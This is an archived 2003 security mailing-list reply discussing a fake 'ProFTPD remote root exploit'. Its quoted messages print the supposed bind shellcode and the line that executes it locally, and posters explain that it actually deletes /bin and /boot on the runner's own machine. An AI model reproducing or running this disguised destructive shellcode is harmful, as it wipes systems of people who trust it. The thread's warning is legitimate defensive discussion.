Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Fri, 24 Oct 2003 17:58:22 +0200
Fucking jokes , i saw a strange shellcode so it didn't use it , hahahahaha, and i saw too the local executed shellcode so again i didin't compiled nor used it. is it normal here ? people publishes here these type of jokes usually ? anybody remembers the sshd fake exploit that binds a shell in port 77~~ ( i don't remember ) but it was really funny ! mein Gott ! Best regards, ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->\x74\x72\x75\x6c\x75\x78 0x02->The truth is out there, 0x03-> outside your mind . __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** \x6e\x73\x72\x67 \x73\x65\x63\x75\x72\x69\x74\x79 \x72\x65\x73\x65\x61\x72\x63\x68 http://www.nsrg-security.com ______________________ ----- Original Message ----- From: "Andreas Gietl" <a.gietl () e-admin de> To: <zim () iq pl> Cc: "Jean-Kevin Grosnakeur" <fufeur () hotmail com>; <full-disclosure () lists netsys com> Sent: Friday, October 24, 2003 4:24 PM Subject: Re: [Full-disclosure] ProFTPD-1.2.9rc2 remote root exploit
On Friday 24 October 2003 16:20, Robert Jaroszuk wrote: yeah, it deletes /bin/* boot/* and few other files.On Fri, 24 Oct 2003, Andreas Gietl wrote: ; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote: ; ; this seems to delete sth on the local harddisk. anybody else seeing
this
; effect? Yea, something like that. /* x86 bind shellcode */ char sc[]= "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; [ cut ] /* connect to the bindshell */ printf("Trying to connect, please wait...\n"); void(*sleep)()=(void*)sc;sleep(5); This exploit tries to run shellcode on local machine. Probably smth evil in this shellcode:-- e-admin internet gmbh Andreas Gietl tel +49 941
3810884
Ludwig-Thoma-Strasse 35 fax +49 (0)1805/39160 - 29104 93051 Regensburg mobil +49 171 6070008 PGP/GPG-Key unter http://www.e-admin.de/gpg.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Valdis . Kletnieks (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re[2]: ProFTPD-1.2.9rc2 remote root exploit Wine (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Lorenzo Hernandez Garcia-Hierro (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete kang (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete dilema (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Cael Abal (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Rob Lewis (Oct 24)
- <Possible follow-ups>
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit GARCIA Lionel (Oct 24)